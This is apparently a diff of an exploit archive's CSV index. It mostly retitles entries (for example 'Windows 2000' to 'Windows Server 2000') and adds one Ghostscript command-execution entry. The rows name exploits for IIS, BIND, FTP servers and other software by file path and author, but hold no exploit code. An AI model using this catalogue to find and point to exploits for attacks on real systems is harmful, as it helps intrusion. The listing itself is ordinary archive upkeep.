-33593,platforms/windows/local/33593.c,"Microsoft Windows 2000/XP/2003/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0
+33593,platforms/windows/local/33593.c,"Microsoft Windows Server 2000/2003/XP/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0
 33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Privilege Escalation (3)",2013-02-24,SynQ,linux,local,0
 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
@@ -8784,6 +8786,7 @@ id,file,description,date,author,platform,type,port
 41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
 41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
 41217,platforms/android/local/41217.txt,"Google Android - RKP EL1 Code Loading Bypass",2017-02-01,"Google Security Research",android,local,0
+41221,platforms/windows/local/41221.txt,"Ghostscript 9.20 - 'Filename' Command Execution",2017-02-02,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -8832,7 +8835,7 @@ id,file,description,date,author,platform,type,port
 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80
 78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Command Execution",2003-08-11,Xpl017Elz,linux,remote,21
 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100
-81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
+81,platforms/windows/remote/81.c,"Microsoft Windows Server 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0
 84,platforms/linux/remote/84.c,"Gopherd 3.0.5 - FTP Gateway Remote Overflow",2003-08-22,vade79,linux,remote,70
 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Code Execution",2003-08-25,"Johnny Cyberpunk",multiple,remote,554
@@ -8855,7 +8858,7 @@ id,file,description,date,author,platform,type,port
 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
-117,platforms/windows/remote/117.c,"Microsoft Windows 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
+117,platforms/windows/remote/117.c,"Microsoft Windows Server 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
 119,platforms/windows/remote/119.c,"Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
@@ -8910,8 +8913,8 @@ id,file,description,date,author,platform,type,port
 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,linux,remote,143
 254,platforms/hardware/remote/254.c,"Cisco - Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23
 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
-266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
+266,platforms/windows/remote/266.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
-268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
+268,platforms/windows/remote/268.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
 269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
 275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
 277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
@@ -9033,7 +9036,7 @@ id,file,description,date,author,platform,type,port
 726,platforms/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote,0
 729,platforms/windows/remote/729.txt,"PHP 4.3.7 - openlog() Buffer Overflow",2004-12-28,"The Warlock [BhQ]",windows,remote,80
 730,platforms/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution with Parameters (PoC)",2004-12-28,ShredderSub7,windows,remote,0
-733,platforms/windows/remote/733.c,"Microsoft Windows 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42
+733,platforms/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42
 734,platforms/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,windows,remote,139
 745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
 746,platforms/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
@@ -9194,7 +9197,7 @@ id,file,description,date,author,platform,type,port
 1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow",2005-12-19,muts,windows,remote,0
 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21
-1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0
+1391,platforms/windows/remote/1391.pm,"Microsoft Windows Server 2003/XP - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0
 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80
 1413,platforms/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0
 1414,platforms/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060
@@ -9407,8 +9410,8 @@ id,file,description,date,author,platform,type,port
 3452,platforms/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass Exploit",2007-03-10,"Stefan Esser",multiple,remote,0
 3462,platforms/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,windows,remote,0
 3463,platforms/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,windows,remote,0
-3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21
+3474,platforms/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",windows,remote,21
-3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - (USER) Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21
+3482,platforms/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",windows,remote,21
 3491,platforms/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution (PoC)",2007-03-15,"Core Security",bsd,remote,0
 3495,platforms/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",windows,remote,6503
 3531,platforms/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",windows,remote,554
@@ -9446,7 +9449,7 @@ id,file,description,date,author,platform,type,port
 3708,platforms/multiple/remote/3708.htm,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,multiple,remote,0
 3724,platforms/linux/remote/3724.c,"Aircrack-NG 0.7 - 'Specially Crafted 802.11 Packets' Remote Buffer Overflow",2007-04-12,"Jonathan So",linux,remote,0
 3728,platforms/windows/remote/3728.c,"Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Overflow",2007-04-13,InTeL,windows,remote,0
-3737,platforms/windows/remote/3737.py,"Microsoft Windows 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139
+3737,platforms/windows/remote/3737.py,"Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow",2007-04-15,"Winny Thomas",windows,remote,139
 3738,platforms/windows/remote/3738.php,"XAMPP for Windows 1.6.0a - mssql_connect() Remote Buffer Overflow",2007-04-15,rgod,windows,remote,80
 3740,platforms/windows/remote/3740.c,"Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow",2007-04-15,devcode,windows,remote,139
 3746,platforms/windows/remote/3746.txt,"Microsoft Windows - DNS RPC - Remote Buffer Overflow (2)",2007-04-18,"Andres Tarasco",windows,remote,445
@@ -10052,7 +10055,7 @@ id,file,description,date,author,platform,type,port
 9500,platforms/windows/remote/9500.cpp,"NaviCopa WebServer 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,windows,remote,0
 9503,platforms/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",hardware,remote,0
 9508,platforms/windows/remote/9508.rb,"ProFTP 2.9 - (welcome message) Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,windows,remote,0
-9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server - Remote Stack Overflow (Windows 2000)",2009-08-31,kingcope,windows,remote,21
+9541,platforms/windows/remote/9541.pl,"Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow",2009-08-31,kingcope,windows,remote,21
 9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow",2009-09-01,muts,windows,remote,21
 9586,platforms/windows/remote/9586.py,"SIDVault 2.0e - Windows Remote Buffer Overflow",2009-09-03,blake,windows,remote,389
 9592,platforms/windows/remote/9592.rb,"SIDVault 2.0e - Windows Remote Buffer Overflow (Metasploit)",2009-09-04,His0k4,windows,remote,389
@@ -10815,7 +10818,7 @@ id,file,description,date,author,platform,type,port
 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
-16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
+16612,platforms/windows/remote/16612.rb,"Microsoft Windows Server 2003/XP/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16616,platforms/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@@ -11505,7 +11508,7 @@ id,file,description,date,author,platform,type,port
 19625,platforms/windows/remote/19625.py,"ALLMediaServer 0.8 - SEH Overflow",2012-07-06,"motaz reda",windows,remote,888
 19632,platforms/hardware/remote/19632.txt,"Tektronix Phaser Network Printer 740/750/750DP/840/930 PhaserLink WebServer - Retrieve Administrator Password",1999-11-17,"Dennis W. Mattison",hardware,remote,0
 19634,platforms/linux/remote/19634.c,"ETL Delegate 5.9.x / 6.0.x - Buffer Overflow",1999-11-13,scut,linux,remote,0
-19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 2000/95/98/NT 4) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0
+19637,platforms/windows/remote/19637.txt,"Microsoft Internet Explorer 5 (Windows 95/98/2000/NT 4) - XML HTTP Redirect",1999-11-22,"Georgi Guninksi",windows,remote,0
 19644,platforms/multiple/remote/19644.txt,"symantec mail-gear 1.0 - Directory Traversal",1999-11-29,"Ussr Labs",multiple,remote,0
 19645,platforms/unix/remote/19645.c,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (1)",1999-11-30,Mixter,unix,remote,0
 19646,platforms/unix/remote/19646.pl,"Qualcomm qpopper 3.0/3.0 b20 - Remote Buffer Overflow (2)",1999-11-30,"Synnergy Networks",unix,remote,0
@@ -11538,7 +11541,7 @@ id,file,description,date,author,platform,type,port
 19724,platforms/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",windows,remote,0
 19729,platforms/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Buffer Overflow",2000-01-10,Zhodiac,linux,remote,0
 19730,platforms/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail Long GET Request",2000-01-17,"Greg Hoglund",windows,remote,0
-19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Services (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0
+19731,platforms/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,windows,remote,0
 19732,platforms/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",multiple,remote,0
 19734,platforms/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",windows,remote,0
 19889,platforms/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name",2000-05-02,"rain forest puppy",windows,remote,0
@@ -11546,7 +11549,7 @@ id,file,description,date,author,platform,type,port
 19738,platforms/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",windows,remote,0
 19741,platforms/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",cgi,remote,0
 19742,platforms/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,multiple,remote,0
-19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 2000/95/98/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0
+19743,platforms/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 95/98/2000/NT 4.0) - Shortcut Exploit",2000-02-04,"Ussr Labs",windows,remote,0
 19745,platforms/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",cgi,remote,0
 19747,platforms/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",cgi,remote,0
 19749,platforms/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,multiple,remote,0
@@ -11652,7 +11655,7 @@ id,file,description,date,author,platform,type,port
 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 - File Access",2000-06-26,"Larry W. Cashdollar",cgi,remote,0
 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Buffer Overflow",2000-06-29,"Matt Conover",linux,remote,0
 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 - FTP Server Exploit",2000-06-21,"Michael Zalewski",unix,remote,0
-20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",windows,remote,0
+20048,platforms/windows/remote/20048.txt,"Microsoft Windows Server 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",windows,remote,0
 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 - Resource Exhaustion",2000-06-30,"SecureXpert Labs",windows,remote,0
 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
@@ -11733,7 +11736,7 @@ id,file,description,date,author,platform,type,port
 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0
 20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,cgi,remote,0
 20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0
-20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 - telnet.exe NTLM Authentication",2000-08-14,@stake,windows,remote,0
+20222,platforms/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - telnet.exe NTLM Authentication",2000-08-14,@stake,windows,remote,0
 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0
 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0
 20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0
@@ -11789,7 +11792,7 @@ id,file,description,date,author,platform,type,port
 20327,platforms/unix/remote/20327.txt,"GNU Ffingerd 1.19 - 'Username' Validity Disclosure",1999-08-23,"Eilon Gishri",unix,remote,0
 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL - Arbitrary Command Execution",2000-10-26,blackangels,hardware,remote,0
 20334,platforms/windows/remote/20334.java,"Cat Soft Serv-U FTP Server 2.5.x - Brute Force",2000-10-29,Craig,windows,remote,0
-20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
+20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Service (Windows 2000/NT 4.0) - '.htw' Cross-Site Scripting",2000-10-28,"Georgi Guninski",windows,remote,0
 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 - AFS ACL Packet Buffer Overflow",2001-01-02,Zhodiac,unix,remote,0
 20340,platforms/unix/remote/20340.c,"Samba 2.0.7 SWAT - Logging Failure",2000-11-01,dodeca-T,unix,remote,0
 20354,platforms/php/remote/20354.rb,"PHP IRC Bot pbot - eval() Remote Code Execution (Metasploit)",2012-08-08,Metasploit,php,remote,0
@@ -11806,7 +11809,7 @@ id,file,description,date,author,platform,type,port
 20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (1)",1998-12-26,duke,unix,remote,0
 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 - IRC Proxy Buffer Overflow (2)",1998-12-26,"jamez and dumped",unix,remote,0
 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Full Path Disclosure",2000-11-10,sozni,cgi,remote,0
-20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0
+20399,platforms/windows/remote/20399.html,"Microsoft Indexing Service (Windows 2000) - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0
 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow",2000-11-14,Vort-fu,beos,remote,0
 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0
 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0
@@ -12408,9 +12411,9 @@ id,file,description,date,author,platform,type,port
 21876,platforms/multiple/remote/21876.txt,"SafeTP 1.46 - Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",multiple,remote,0
 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0
 21888,platforms/windows/remote/21888.rb,"KeyHelp - ActiveX LaunchTriPane Remote Code Execution (Metasploit)",2012-10-11,Metasploit,windows,remote,0
-21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0
+21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for Windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0
-21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0
+21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for Windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0
-21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
+21902,platforms/windows/remote/21902.c,"Microsoft Windows Server 2000/NT 4/XP - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0
 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0
 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0
 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0
@@ -12651,7 +12654,7 @@ id,file,description,date,author,platform,type,port
 22758,platforms/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",windows,remote,0
 22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0
 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0
-22782,platforms/windows/remote/22782.py,"Microsoft Windows 2000 - Active Directory Remote Stack Overflow",2003-07-02,"Core Security",windows,remote,0
+22782,platforms/windows/remote/22782.py,"Microsoft Windows Server 2000 - Active Directory Remote Stack Overflow",2003-07-02,"Core Security",windows,remote,0
 22783,platforms/windows/remote/22783.txt,"Microsoft Internet Explorer 5/6 - MSXML XML File Parsing Cross-Site Scripting",2003-06-17,"GreyMagic Software",windows,remote,0
 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 - Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0
 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0
@@ -12665,7 +12668,7 @@ id,file,description,date,author,platform,type,port
 22832,platforms/freebsd/remote/22832.pl,"Gkrellmd 2.1 - Remote Buffer Overflow (2)",2003-06-24,dodo,freebsd,remote,0
 22833,platforms/windows/remote/22833.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (1)",2003-06-24,"Mark Litchfield",windows,remote,0
 22834,platforms/windows/remote/22834.c,"Alt-N WebAdmin 2.0.x - USER Parameter Buffer Overflow (2)",2003-06-24,"Mark Litchfield",windows,remote,0
-22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
+22837,platforms/windows/remote/22837.c,"Microsoft Windows Server 2000/NT 4 Media Services - 'nsiislog.dll' Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
 22838,platforms/windows/remote/22838.txt,"BRS Webweaver 1.0 - Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
 22848,platforms/linux/remote/22848.c,"ezbounce 1.0/1.5 - Format String",2003-07-01,V9,linux,remote,0
 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0
@@ -12704,7 +12707,7 @@ id,file,description,date,author,platform,type,port
 22976,platforms/freebsd/remote/22976.pl,"FreeBSD 4.8 - realpath() Off-by-One Buffer Overflow",2003-07-31,daniels@legend.co.uk,freebsd,remote,0
 22994,platforms/multiple/remote/22994.txt,"Sun One 5.1 / IPlanet 5.0/5.1 - Administration Server Directory Traversal",2003-08-08,"Jim Hardisty",multiple,remote,0
 23002,platforms/windows/remote/23002.txt,"MDaemon SMTP Server 5.0.5 - Null Password Authentication",2003-08-09,"Buckaroo Banzai",windows,remote,0
-23019,platforms/windows/remote/23019.c,"Microsoft Windows 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,windows,remote,0
+23019,platforms/windows/remote/23019.c,"Microsoft Windows Server 2000 - Subnet Bandwidth Manager RSVP Server Authority Hijacking",2003-08-11,root@networkpenetration.com,windows,remote,0
 23024,platforms/multiple/remote/23024.txt,"SurgeLDAP 1.0 d - Full Path Disclosure",2003-08-13,"Ziv Kamir",multiple,remote,0
 23038,platforms/windows/remote/23038.c,"eMule 0.2x Client - OP_SERVERIDENT Heap Overflow",2003-09-01,"Stefan Esser",windows,remote,0
 23040,platforms/windows/remote/23040.c,"eMule 0.2x - AttachToAlreadyKnown Double-Free",2003-09-01,"Stefan Esser",windows,remote,0
@@ -13250,8 +13253,8 @@ id,file,description,date,author,platform,type,port
 25034,platforms/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0
 25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
 25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
-25049,platforms/windows/remote/25049.txt,"Microsoft Windows 2000/2003/XP - winhlp32 Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
